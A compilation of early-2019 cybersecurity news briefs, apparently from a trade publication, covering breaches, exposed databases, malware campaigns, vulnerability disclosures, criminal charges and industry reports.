Despite a 28% decrease in cybersecurity startups during 2017, global venture capital funding for cybersecurity rebounded with record high investments, according to Strategic Cyber Ventures.
Though last year saw $5.3 billion in cybersecurity global ventures, Strategic Cyber Ventures called this an unsustainable investment rate.
Over half of cybersecurity founders of new startups have more than a decade of executive or entrepreneurial experience, as opposed to the past two years in which there was nearly an even split between experienced founders and less-seasoned founders, the report found.
In fact, 2018 was the fifth consecutive year in which Israel enjoyed increasing round sizes at the seed stage. Additionally, the amount of funding across all stages increased, keeping the recent trend of fewer companies raising larger amounts of capital moving forward.
Though there were emerging fields among new startups in 2018, including cybersecurity solutions for cryptocurrencies and software-defined perimeter (SDP), the most overwhelmingly funded field across all stages was internet of things (IoT) security. Though most startups were within the SCADA and medical devices sub-domains, other emerging fields included threat detection, security operations, data protection and cloud security.
Nevertheless, the report said, “In cybersecurity, there are likely many zombies out there. They’ve raised big rounds, growth has slowed, perhaps due to vendor fatigue or increased competition, and now these companies can’t raise at increased valuations from prior rounds, or at all, and are being propped up by existing investors that will eventually grow weary of keeping them alive. These companies will eventually float to the surface over the next few years with less than desirable outcomes for investors and founders.”
According to Chris Ahern, principal, Strategic Cyber Ventures, "We’ve seen massive funds formed over the past few years and some of that money is making its way to cybersecurity deals. Second, we’ve seen some strong exits in the space through IPOs and M&A over the last couple of years."
The problems aren’t going away. 2018 had several massive, high-profile breaches and we’ll continue to see this into 2018 as well as a continued discussion around privacy. The real question is whether it’s a good thing that 2018 was a record year for cybersecurity investment.”
Another California-based communications provider has announced a potential security incident, as VOIPo confessed that it left a database containing seven million call logs, six million text messages and other internal documents containing unencrypted passwords unprotected without a password.
After security researcher Justin Paine notified the company, he wrote, “This database was promptly secured after I notified the company. I would like to thank VOIPo for their quick assistance in securing this data.”
In the security notice shared with customers, VOIPo wrote: “We were made aware of a development server that was exposed for a small window of time. When it was discovered, it was taken offline within 15 minutes of being notified by Cloudflare that they had discovered it. It primarily had some data for database load testing made up of call logs (partial numbers only), SMS messages our system flagged as SPAM and some general server log data."
VOIPo said the dev server was isolated and no other network was at risk because additional production systems are firewalled so that any connection to those systems would not have been possible. However, these statements have been called "misleading" on Twitter.
The VOIPo database reportedly had been exposed since June 2018 and contains call and message logs dating back to May 2015. The news comes only two months after a database misconfiguration at San Diego–based Voxox leaked 26 million text messages. As was the case in the Voxox breach, if text messages containing two-factor authentication (2FA) codes or password reset links were intercepted, they could have allowed the attacker to hijack a user’s account.
“It does not take much for outsiders to find unsecured databases and access sensitive information,” said Stephan Chenette, CTO and co-founder, AttackIQ. “In fact, there are now tools designed to detect misconfigurations within cloud tools like Amazon's S3. Misconfigured security controls are an all-too-common problem. Organizations are increasingly struggling with limited and under-trained IT resources that lead to using default account passwords, unpatched systems and poorly configured network devices.”
Although VOIPo claims there is no evidence to indicate a breach occurred, “the company cannot guarantee that no unauthorized users accessed the data, especially since it was left unsecured and easily available for months,” said Ruchika Mishra, director of products and solutions, Balbix.
The vast majority of senior decision makers across the globe expect data theft and cyber-disruption to increase in 2019, according to the latest report from the World Economic Forum (WEF).
The annual Global Risks Report for 2019 uses interviews with risk experts, business leaders, academics and others to better understand the challenges facing the world economy.
Rising dependency on technology ensured cyber-related risk remained front-of-mind for respondents, both in the near and long-term.
Some 82% said they expect data and monetary theft attacks to increase in 2019, while 80% said the same for cyber-related disruption to operations and infrastructure.
A slightly smaller number anticipated an increase in fake news (69%), personal identity theft (64%) and loss of privacy to companies (63%).
Over the next decade, respondents placed data fraud/theft and cyber-attacks fourth and fifth in terms of most likely risks, while cyber-attacks and “critical information infrastructure breakdown” were placed seventh and eighth in terms of biggest potential impact.
“There were further massive data breaches in 2018, new hardware weaknesses were revealed, and research pointed to the potential uses of artificial intelligence to engineer more potent cyber-attacks,” the report noted. “Last year also provided further evidence that cyber-attacks pose risks to critical infrastructure, prompting countries to strengthen their screening of cross-border partnerships on national security grounds.”
Veeam’s regional VP for UK & Ireland, Mark Adams, claimed the report highlights the continued need for investment in cyber-threat mitigation.
“Spending time and money on thorough cybersecurity and disaster recovery planning is no longer evidence of being overly paranoid,” he added. “When disaster strikes, whether from a data breach or service outage, having these kinds of measures in place to rely on is what will separate successful businesses from struggling ones.”
However, the findings show a slight change from last year’s report, which listed cyber-attacks as the third most likely global risk.
Millions of sensitive files dating back decades have been exposed after 3TB of data on a storage server was left publicly exposed by the Oklahoma Securities Commission.
Researchers at UpGuard made the discovery on December 7 last year and it was fixed a day later by the commission, part of the state’s Department of Securities which regulates and administers the trading securities sector.
It was first registered as publicly accessible by Shodan a week earlier.
“The data was exposed via an unsecured rsync service at an IP address registered to the Oklahoma Office of Management and Enterprise Services, allowing any user from any IP address to download all the files stored on the server,” explained the security vendor.
“The website for the Securities Commission has an UpGuard Cyber Risk score of 171 out of 950, indicating severe risk of breach. Among the issues lowering the website’s score is the use of the web server IIS 6.0, which reached end of life in July 2015, meaning no updates to address any newly discovered vulnerabilities have been released in the last three and a half years.”
The data, which dated back to 1986 and included email back-ups and virtual images, covered a broad sweep of different areas.
These included personal information such as the Social Security numbers of 10,000 brokers, and highly sensitive life insurance information on terminally ill AIDS patients.
Also exposed were system credentials which could allow an attacker to hijack Department of Securities workstations, third-party security filings, and accounts with Thawte, Symantec Protection Suite, Tivoli and others.
The leaked data also included “spreadsheets documenting the timeline for investigations by the FBI and people they interviewed,” potentially putting witnesses at risk.
“We need to stop making it so easy for hackers and bad actors who are simply using tools that have been around for years,” argued Suzanne Spaulding, Nozomi Networks adviser and former DHS under secretary.
“Hackers use a tool called Shodan that allows anyone to scan the internet, looking for devices and computers, connected to the internet, but not protected.”
A leading security researcher has warned of a major trove of breached data being shared on hacking sites, containing over 772 million unique email addresses and more than 21 million unique passwords.
Troy Hunt, owner of the Have I Been Pwned (HIBP) breached credentials site, explained that he was alerted to the collection of 12,000 files hosted on the MEGA cloud service last week.
Although the 87GB dump was subsequently removed, he was also notified of it being shared on a hacking forum under the moniker “Collection #1.”
The total collection amounted to nearly 2.7 billion rows comprised of credentials stolen from thousands of sources in multiple breaches, said Hunt.
After cleaning up the data, he reduced this figure to 772.9 million emails — the largest ever to be loaded into HIBP — and 21.2 million dehashed passwords.
“Whilst there are many legitimate breaches that I recognise in that list, that's the extent of my verification efforts and it's entirely possible that some of them refer to services that haven't actually been involved in a data breach at all,” Hunt explained.
“However, what I can say is that my own personal data is in there and it's accurate; right email address and a password I used many years ago. Fortunately, only passwords that are no longer in use, but I still feel the same sense of dismay that many people reading this will when I see them pop up again. They're also ones that were stored as cryptographic hashes in the source data breaches … but have been cracked and converted back to plain text.”
Hunt encouraged users to check whether their emails and passwords are affected, by visiting HIBP. However, they’ll have to search separately for them as the site doesn’t store paired credentials together for security reasons.
The likelihood is the data could be fed into credential stuffing programs to automatically try to unlock accounts over multiple other sites.
Hunt recommended users get a password manager to store long-and-strong unique credentials for each site.
“A password manager is also a rare exception to the rule that adding security means making your life harder,” he said.
A malicious MS Word document, titled “eml_-_PO20180921.doc,” has been found in the wild, and according to researchers at Fortinet's FortiGuard Labs, the document contains auto-executable malicious VBA code.
Victims who receive and open the document are prompted with a security warning that macros have been disable. If the user then clicks on “enable content,” the NanoCore remote access Trojan (RAT) software is installed on the victim’s Windows system.
According to FortiGuard Labs, the NanoCore RAT was developed in the .Net framework back in 2013. Despite its continued use, the author was convicted by the FBI and sentenced to nearly three years in prison. Researchers captured a sample of this latest version (220.127.116.11), which uses NanoCore to execute malicious behavior.
Spreading through phishing campaigns that dupe victims into opening the document, the malware is downloaded from www.wwpdubai.com. Once executed, the VBA code downloads and saves an EXE file from the URL.
“I loaded CUVJN.exe with the .Net debugger dnSpy. Tracing from its main function, we can see that it loads numerous data blocks from its resource section, and then puts them together and decrypts them,” wrote researcher Xiaopeng Zhang.
In order to trace the main functions, researchers loaded CUVJN.exe with the .Net debugger dnSpy and found that it loads, puts together and then decrypts multiple data blocks from its resource section in order to get to a new PE file.
“According to my analysis, the decrypted .Net program is a daemon process. Let’s continue to trace it from its main() function. At first, it creates a Mutex and checks if the process already exists to ensure only one process of this program is running. Next, it checks if Avast is running on the victim’s system by detecting whether the “snxhk.dll” module is loaded or not. If so, it keeps waiting until it has been unloaded. Avast is an AntiVirus software, and “snxhk.dll” is one of its modules,” Zhang wrote.
Unfortunately, .dll is a daemon process, which Zhang said he was not able to kill because it has a “ProtectMe” class, though he does provide steps for removing the malware.
Players who love to indulge in online battle should heed caution when playing Fortnite, according to researchers at Check Point who have disclosed vulnerabilities that could give a malicious actor access to a user’s account and their V-Bucks.
In addition to gaining full access to a user’s account, an attacker who exploited the vulnerability – which has now been fixed – could have eavesdropped on a player’s in-game conversations, potentially also picking up any sounds in the background where the game was being played, researchers said.
According to today’s press release, an attacker could have stolen login credentials by exploiting three flaws found in the web infrastructure of Epic Games, specifically in compromised sub-domains through which the malicious actor could intercept authentication tokens.
The attack, which reportedly could be executed in a single click, would grant an attacker the ability to purchase virtual in-game currency using the victim’s payment card details and then be sold for real money outside the game.
“Researchers were able to demonstrate the token-based authentication process used in conjunction with Single Sign-On (SSO) systems such as Facebook, Google and Xbox” and reported the vulnerability to Epic Games, the press release stated.
“Fortnite is one of the most popular games played mainly by kids. These flaws provided the ability for a massive invasion of privacy,” said Oded Vanunu, head of products vulnerability research for Check Point in a press release.
“Together with the vulnerabilities we recently found in the platforms used by drone manufacturer DJI, show how susceptible cloud applications are to attacks and breaches. These platforms are being increasingly targeted by hackers because of the huge amounts of sensitive customer data they hold. Enforcing two-factor authentication could mitigate this account takeover vulnerability,” continued Vanunu.
Still, Check Point advised players to remain vigilant and use discretion when sharing information online and cautioned that because of the increasing popularity and success of phishing campaigns, players should keep in mind that there are many dubious and dangerous links that should not be trusted.
Two security researchers working independently on different projects have discovered multiple vulnerabilities that affect multiple web hosting platforms, including the popular Bluehost, as well as Amadeus, the online reservation system used by several different airlines.
According to independent security researcher Paulos Yibelo, Bluehost, a popular web hosting platform, was riddled with vulnerabilities, including one that would allow complete account takeover.
Rated as having a high severity, the vulnerabilities grant attackers access to personally identifiable information, partial payment information and tokens that grant access to sites like WordPress, Website Planet wrote. In addition to those bugs discovered in BlueHost, Yibelo also reported several bugs in other web hosting platforms, including Dreamhost, HostGator, OVH, and iPage.
“This should serve as a warning call for those companies authenticating customers online with legacy technology. Today, account takeover is not a hard attack to deploy, and the consequences can be devastating with bad actors stealing money and products,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.
In related news, security researcher Noam Rotem, who was working with Safety Detective research lab, discovered a major vulnerability in Amadeus, an online booking system used by nearly half (44%) of all airlines worldwide, including United Airlines, Lufthansa, Air Canada, and many more, according to a January 15 blog post.
After receiving a message to check the passenger name record (PNR), the researchers were able to view any PNR and access customer data.
“With the PNR and customer name at our disposal, we were able to log into ELAL’s customer portal and make changes, claim frequent flyer miles to a personal account, assign seats and meals, and update the customer’s email and phone number, which could then be used to cancel/change flight reservation via customer service,” the researchers wrote.
A malicious actor would need to have a working knowledge of the PNR code in order to exploit the vulnerability, which has since been fixed.
Researchers have uncovered a twelvth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain.
RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.
This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.
This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.
This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.
Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.
Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.
Two Ukrainian nationals have been charged with hacking into the Securities and Exchange Commission (SEC) and stealing sensitive information for use in insider trading.
Artem Radchenko, 27, and Oleksandr Ieremenko, 26, both from Kiev, were charged with 16 counts including securities fraud conspiracy, wire fraud conspiracy, computer fraud conspiracy, wire fraud and computer fraud.
They’re alleged to have targeted the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, which stores documents related to company disclosures including test filings made before announcements go public.
These filings often contain information similar to that of the official final filing, meaning the two alleged hackers could get their hands on sensitive info before it went public to gain an advantage on the markets.
They’re alleged to have used a variety of tactics to obtain unauthorized access to the EDGAR servers, including directory traversal, phishing and malware. They’re then said to have copied the information to a server in Lithuania.
The Ukrainians recruited traders to their scheme, who used the stolen information to make over $4m in profits, according to the Department of Justice.
For example, they’re alleged to have bought up $2.4m worth of shares in a public company based on information contained in a stolen test filing about its upcoming financials. They then sold these shares for a $270,000 profit over the next day after the company announced it expected record earnings for 2016.
“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said assistant attorney general Brian Benczkowski. “The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”
The charges carry a potential maximum sentence of 25 years behind bars and $500,000 fine, or twice the gain or loss from the relevant offenses.
Ieremenko has been in trouble before, charged in 2015 for his part in an international conspiracy to hack and steal non-public sensitive market information from three newswire organizations, using the same techniques.
A total of 10 defendants have been charged as part of the latest conspiracy.
The UK’s National Cyber Security Centre (NCSC) has urged organizations still on Windows 7 to plan now for the end of extended support in a year’s time.
The GCHQ arm reminded IT managers that the operating system will no longer receive free updates from January 14 2020.
That will mean any machines still running then could be exposed to a greater risk of malware, and potentially unreliable systems.
The NCSC drew parallels with the end-of-support for Windows XP in 2014.
“It wasn’t long after that before exploitation of the final version of the platform became fairly widespread. Malware can spread much more easily on obsolete platforms because, without security updates, known vulnerabilities will remain unpatched. As a result, it’s crucial to move away from them as quickly as possible,” it explained.
“We know there are costs involved in keeping up to date. However, doing so is one of the most effective ways of keeping your networks and devices secure - this is why planning your upgrades far in advance is especially important.”
For organizations unable for any reason to migrate swiftly to Windows 10 — for example if there are compatibility issues with legacy software — the NCSC has listed a few key short-term recommendations.
These include preventing access to untrusted services and removable media, converting systems to thin clients, removing access for remote workers and applying anti-malware and intrusion detection tools.
For those businesses keen to remain on Windows 7 beyond January 14 2020, Microsoft is also offering Extended Security Updates (ESUs) which will be costed per device and increase in costs every year until January 2023.
Another option is to buy the Windows Virtual Desktop service, virtualizing Windows 7 on Azure VMs. This option comes with free ESUs but will also be available only for three years.
Despite the burgeoning IoT market, organizations made limited progress on IoT security in 2018, according to a new report from Gemalto. Though there is evidence of incremental improvements, security measures are being outpaced by the rapid growth of IoT, which is on track to hit 20 billion devices by 2023.
The survey queried 950 IT and business decision-makers with awareness of IoT in their organization in 2018. Of those, only 48% of companies said that they have the ability to detect whether their IoT devices have suffered a breach; however, 90% of respondents believe that security is a major concern for their customers.
According to the report, more than half (54%) of consumers fear that their privacy may be compromised with IoT devices, yet only 14% of the survey participants see protecting customer privacy by security IoT devices as an ethical responsibility.
“Given the increase in the number of IoT-enabled devices, it’s extremely worrying to see that businesses still can’t detect if they have been breached,” said Jason Hart, CTO, data protection at Gemalto, in a press release. “With no consistent regulation guiding the industry, it’s no surprise the threats – and, in turn, vulnerability of businesses – are increasing. This will only continue unless governments step in now to help industry avoid losing control.”
More than a third (38%) of participants said they experience privacy challenges associated with collecting large amounts of IoT data. Still, more organizations have started using passwords to protect IoT devices. While 63% of organizations said they used passwords in 2017, the number of positive responses rose to 66% in 2018.
Businesses are clearly feeling the pressure of protecting the growing amount of data they collect and store,” Hart said. “But while it’s positive they are attempting to address that by investing in more security, such as blockchain, they need direct guidance to ensure they’re not leaving themselves exposed. In order to get this, businesses need to be putting more pressure on the government to act, as it is them that will be hit if they suffer a breach.”
Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.
“The first step in addressing the issue, was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”
As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.
After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.
At the time of writing this, the website for the city of Del Rio was up and running, though there is no word on the full scope of the attack. Infosecurity has contacted the city, and this story will be updated with any response.
“The growing number of exploit kits and malware at their disposal is emboldening malicious actors to attack organizations with a rich trove of consumer data,” said Mike Bittner, digital security and operations manager at The Media Trust.
“Government organizations, in particular city governments, are prime targets; they not only process a lot of citizen and business data but are also less secure as tighter budgets severely limit what IT updates they can carry out. Bad actors have no doubt put the 89,000 local governments across the country in their cross hairs. It is just a matter of time before many of these governments realize they’ve been hacked.”
As the US inches toward a full month of a government shutdown, concerns over the impact on national security and cybersecurity continue to mount, and according to security experts from Juniper Networks, Untangle and Vectra, the shutdown may affect government IT recruiting and hiring.
With the skills gap being one of the hurdles every company must clear in order to mature in their overall cybersecurity posture, most organizations are trying to get more creative when it comes to recruitment. The government, though, is in its 25th day of a shutdown.
“The biggest impact of the shutdown, in my opinion, is that furloughing cybersecurity analysts creates a vulnerability for government networks. As we all know, the top problem in security today is the shortage of trained cybersecurity professionals, and the cybersecurity skills shortage was already getting worse in 2018 with millions of unfilled cybersecurity jobs,” said Nick Bilogorskiy, cybersecurity strategist at Juniper Networks.
The problem is exacerbated because some staff are furloughed with the shutdown As was reported by Infosecurity last week, attackers can potentially intensify their activity and exploit security gaps and vulnerabilities resulting from the shutdown. When considering the long-term ramifications, Bilogorskiy said it’s likely that the government will lose valuable cybersecurity talent to the private sector.
“During prior shutdowns, recruiting and hiring efforts have certainly been impacted, as these are not typically considered essential functions,” said Dave Mihelcic, federal chief technology and strategy officer for Juniper Networks and former chief technology officer of Defense Information Systems Agency (DISA).
“Perhaps the more significant challenge posed by these shutdowns was the lasting impressions they made on young IT professionals," Mihelcic continued. "Undoubtedly IT job seekers had a more negative view of federal employment due to the shutdown. Likewise the most talented IT professionals in federal service were left with lasting questions about their future that would cause some to seek outside opportunities.”
The problem isn't limited in scope, either. Yes, expired certificates are a problem, but collaboration between the public and private sector is critical to strong cyber-defense. "With only a skeleton crew at the helm, data sharing and rapid response can fall by the wayside, leaving our nation vulnerable to cyber threats and attacks. The longer the shutdown continues, the more opportunity there is for both private and state-sponsored attackers to take advantage of any possible lapses in oversight,” said Heather Paunet, vice president of product management at Untangle.
Government agencies have often lost potential talent to the salary battle with private industry, but the biggest concern of the government shutdown is that this type of instability would hamper the federal government’s ability to attract and retain good cybersecurity talent, according to Chris Morales, head of security analytics at Vectra.
"With the number of available roles in the private sector that pay with much more lucrative salaries and benefits, it’s going to just get harder for government agencies to compete. If anyone is in need of more automation and efficiency in security operations processes, it will be these federal agencies.”
Two major UK high street banks have started to send out replacement cards for some of their customers, nine months after one lender reported fraudulent activity to Ticketmaster.
Customers of NatWest and RBS have taken to social media to vent their frustration over the way the incident has been handled.
Some complained that this is the first they’ve heard of the breach, which Ticketmaster reported in June and is believed to have affected in the region of 40,000 UK customers.
Others wanted to know if the letter sent by their bank was genuine.
“During 2018 Ticketmaster announced that they suffered a data breach between September 2017 and June 2018, which included data for some of our customers because of this we are replacing all customer debit and credit cards that may have been compromised by this breach,” explained a Twitter response to one such query by NatWest.
The banks claim they are issuing the replacement cards as a precaution, so there’s no confirmation that details were definitely accessed in the incident.
However, the lengthy delay in responding to the breach comes in stark contrast to banking start-up Monzo which requested Mastercard to issue replacement cards for all affected customers back in April last year.
In fact, the bank wrote in a blog post that it had initially contacted the ticketing giant to inform it of a potential breach, a warning that appeared to have gone unheeded for nearly two months.
Breaches are often first detected by banks as they’re able to analyze fraud patterns on customer cards to pinpoint a merchant they have in common.
The breach itself was the result of digital skimming code known as Magecart being seeded into software provided by a third-party developer Inbenta Technologies.
The latter claimed that Ticketmaster had implemented it incorrectly on its payments page.
“We were unaware of this, and would have advised against doing so had we known, as it presents a point of vulnerability,” it said at the time.
It’s unclear how many RBS and NatWest customers have experienced fraud as a result of the Ticketmaster breach, although card details from other Magecart breaches at BA and Newegg were spotted for sale on dark web sites just a week later.
This would seem to highlight the need for a speedy response from all parties in such cases, including the breached firm and relevant banks/card providers.
Many organizations may find they’re better off hiring pen testers and in-house security researchers directly than running bug bounty programs, according to new MIT research.
The New Solutions for Cybersecurity paper features a surprising analysis of bug bounty programs in the chapter, Fixing a Hole: The Labor Market for Bugs.
It studied 61 HackerOne bounty programs over 23 months — including those run for Twitter, Coinbase, Square and other big names — and one Facebook program over 45 months.
It claimed that, contrary to industry hype, organizations running these programs don’t benefit from a large pool of white hats probing their products. Instead, an elite few produce the biggest volume and highest quality of bug reports across multiple products, earning the biggest slice of available rewards.
It’s also claimed that even these elite “top 1%” ethical hackers can’t make a decent wage by Western standards.
The top seven participants in the Facebook program studied made just $34,255 per year from an average of 0.87 bugs per month, while from the HackerOne dataset it was estimated that they made just $16,544 from 1.17 bugs per month.
There are, of course, exceptions: last week we reported that one company has upped its maximum payout for iOS zero-day exploits to $2m. However, it appears that these programs offer more of a salary top-up to Western researchers than a main source of income.
Security research firm Trail of Bits claimed the findings proved that firms should reconsider their security strategies by hiring “boffins” directly as consultants instead of running bug bounty programs.
“The authors of Fixing a Hole argue that bug bounties should be designed to incentivize the elite. They say that making bounties invite-only lowers the operational cost of managing a tsunami of trivial, non-issue, and duplicate bugs. Only 4-5% of bugs from Google, Facebook, and GitHub’s public-facing bounty programs were eligible for payment,” it argued in a blog post.
“According to the authors, a small number of bounty hunters are indispensable and hold significant power to shape the market for bug bounty programs. Based on this, hiring security consultants under terms and conditions that can be controlled seems more practical.”
That view is unsurprisingly not shared by HackerOne CEO, Marten Mickos, who said the MIT study is not representative.
“If it is based on HackerOne data, it is only based only on a fragment of it. The hacker community is indeed power-law distributed,” he added in comments sent to Infosecurity.
“The top performers are orders of magnitude more productive than newcomers. The beauty is that many newcomers rise very quickly in the ranks. Within this merit-based system, there is unlimited opportunity for one with skill and will."
Report co-author and CEO of Luta Security, Katie Moussouris, doubled down on the findings, claiming that independent researchers are “better off pen testing or living the good life of in-house research staff.”
“Orgs can't #bugbounty their way to secure, same as they can't pen test their way to secure,” she tweeted. “The myth of ‘many eyes’ is convenient, but untrue as proven in both open source & bounties. Skilled bug bounty hunters rarely make a good living by Western standards.”
The Polish government is reportedly considering a ban of the use of Huawei products by the public sector following the arrest of an employee of the firm on suspicion of espionage.
Country sales director, Wang Weijing, was arrested on Friday along with a former Polish official who was apparently responsible for issuing security certificates for government IT equipment.
Huawei has sought to distance itself from the spying allegations by sacking Wang. The firm has said in a statement that the individual had brought the Shenzhen giant into disrepute, but that at the same time his alleged actions “have no relation to the company.”
With national security concerns over Chinese firms growing in the West, Warsaw could be inclined to join others in cooling its relationship with the world’s biggest telecoms equipment maker.
A senior government official told Reuters it was considering a public sector ban on Huawei alongside possible legislation which could allow restrictions to be placed on firms posing a national security threat.
Cybersecurity minister, Karol Okonski, told the news site: “We will analyze whether ... our decision can include an end to the use ... of Huawei products.”
“We do not have the legal means to force private companies or citizens to stop using any IT company’s products,” he added. “It cannot be ruled out that we will consider legislative changes that would allow such a move.”
Although the firm has repeatedly hit back at claims it is a security risk, stating it is a victim of wider geopolitical tensions, the US and Australia have effectively banned its equipment from their 5G networks while New Zealand and Canada are mooting the same.
Japan has said it will prevent the firm from competing for government contracts.
In the UK, the firm has pledged $2bn to allay recently aired security concerns about vulnerabilities in its products, although its equipment will still be used in BT’s 5G edge networks. There’s also the possibility that the government will go further.
“We need to decide the extent to which we are going to be comfortable with Chinese ownership of these technologies and these platforms in an environment where some of our allies have taken a very definite position,” MI6 chief Alex Younger has said.
Three different vulnerabilities in the Schneider Electric EVlink Parking electric vehicle charging station, which could have allowed an attacker to halt the charging process, have been patched, according to Positive Technologies.
Researchers discovered the vulnerabilities, CVE-2018-7800, CVE-2018-7801 and CVE-2018-7802, in charging stations used at parking environments in several countries, including at offices, hotels, supermarkets, fleets and municipals. The vulnerabilities reportedly affect EVLink Parking v3.2.0-12_v1 and earlier.
“Schneider Electric products are widely used in countries all over the world where the electric vehicle industry is developing. Exploitation of these vulnerabilities may lead to serious consequences,” says Paolo Emiliani, industry and SCADA research analyst at Positive Technologies said in a press release. “Attackers can actually block electric car charging and cause serious damage to the energy industry.”
According to today's news post, if exploited, the vulnerabilities would enable cyber-criminals to stop the charging process for vehicles plugged into the affected stations, as well as unlock and steal the charging cables.
Specifically, CVE-2018-7800 and CVE-2018-7802 gave attackers privileged access to the charging station so that a hacker could “stop the charging process, switch the device to the reservation mode, which would render it inaccessible to any customer until reservation mode is turned off, and even unlock the cable during the charging by manipulating the socket locking hatch, meaning attackers could walk away with the cable.”
In addition, exploitation of the second vulnerability enabled access to the web-interface, where an attacker could directly manage the operating system and make changes to files and configurations or add new users or back doors.
Schneider stated that customers can set up a firewall to block remote/external access except by authorized users as a risk mitigation strategy and recommended several cybersecurity best practices, including locating control and safety system networks and remote devices behind firewalls, and keeping those isolated from the business network.
“Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices,” the security notification stated.
After news that a bug in its software resulted in a data breach, Singapore Airlines (SIA) has today issued a warning on Facebook, alerting customers to be wary of scams and phishing sites promising free airline tickets.
In what the company called a fraudulent online survey being dispersed via WhatsApp, scammers ask users if they have ever traveled with the airline and make the specious claim that SIA is offering free tickets in celebration of its anniversary.
In truth the survey is a scam attempting to trick SIA customers into giving their personal and credit card information. “If a recipient answers the survey questions and click on ... 'Claim Tickets' or 'WhatsApp,' user will be redirected to a non-SIA website that is designed to trick the recipients into filling in their personal and credit card information. This fraudulent website is only accessible via mobile device browsers. They are shared and forwarded via WhatsApp,” SIA wrote.
In addition, the company is using social media to reach its customers as well. “It has come to our attention that there is a website that claims to be from Singapore Airlines, offering free air tickets as prizes, before proceeding to request personal data,” Singapore Airlines wrote on Facebook.
“We have reported the site to be taken down and would like to advise customers to exercise discretion when revealing personal data to unverified sources. These websites, emails and calls should be verified if in doubt. Please send us details on our social media channels or via this link http://singaporeair.com/en_UK/feedback-enquiry/.
“We would also like to advise customers to be cautious of social media posts and phishing websites that appear similar to our official website singaporeair.com. Thank you.”
Cyber-criminals continue to prey on the naïveté and trust of end users. Already in 2019, Infosecurity has reported on multiple different scams, such as 60% of UK consumers leaving themselves vulnerable to New Year’s resolution online scams and the return of the WhatsApp Gold scam.
Increasingly, though, users are realizing that with all online and mobile ads, nothing is ever really free. One Facebook user warned, “If it sounds/looks to good to be true, it usually is! Always delete these things after checking official websites!”
Crypto-mining malware has again topped the threat index, with Coinhive holding strong in the number one malware threat for the 13th consecutive month, according to the latest Global Threat Index for December 2018, published by Check Point.
The threat index looks at the most common active malware variants and trends as cyber criminals evolve toward crypto-mining and multipurpose malware.
A second-stage downloader, SmokeLoader, first identified back in 2011, jumped to ninth place on the December top-10 list. “After a surge of activity in the Ukraine and Japan, its global impact grew by 20. SmokeLoader is mainly used to load other malware, such as Trickbot Banker, AZORult Infostealer and Panda Banker,” according to a press release.
“December’s report saw SmokeLoader appearing in the top 10 for the first time. Its sudden surge in prevalence reinforces the growing trend towards damaging, multipurpose malware in the Global Threat Index, with the top 10 divided equally between crypto-miners and malware that uses multiple methods to distribute numerous threats,” said Maya Horowitz, threat intelligence and research group manager at Check Point.
“The diversity of the malware in the Index means that it is critical that enterprises employ a multilayered cybersecurity strategy that protects against both established malware families and brand new threats.”
For mobile malware, Triada, a modular backdoor for Android that grants super-user privileges to downloaded malware, ranked number one.
“Check Point researchers also analyzed the most exploited cyber vulnerabilities. Holding on to first place was CVE-2017-7269, whose global impact also rose slightly to 49%, compared to 47% in November. In second place was OpenSSL TLS DTLS Heartbeat Information Disclosure, with a global impact of 42% closely followed by PHPMyAdmin Misconfiguration Code Injection with an impact of 41%,” the press release stated.
Not surprisingly, the report also reflected a rise in banking Trojans, particularly in the data-stealing Trojan, Ramnit, which ranked eighth on the top-10 list.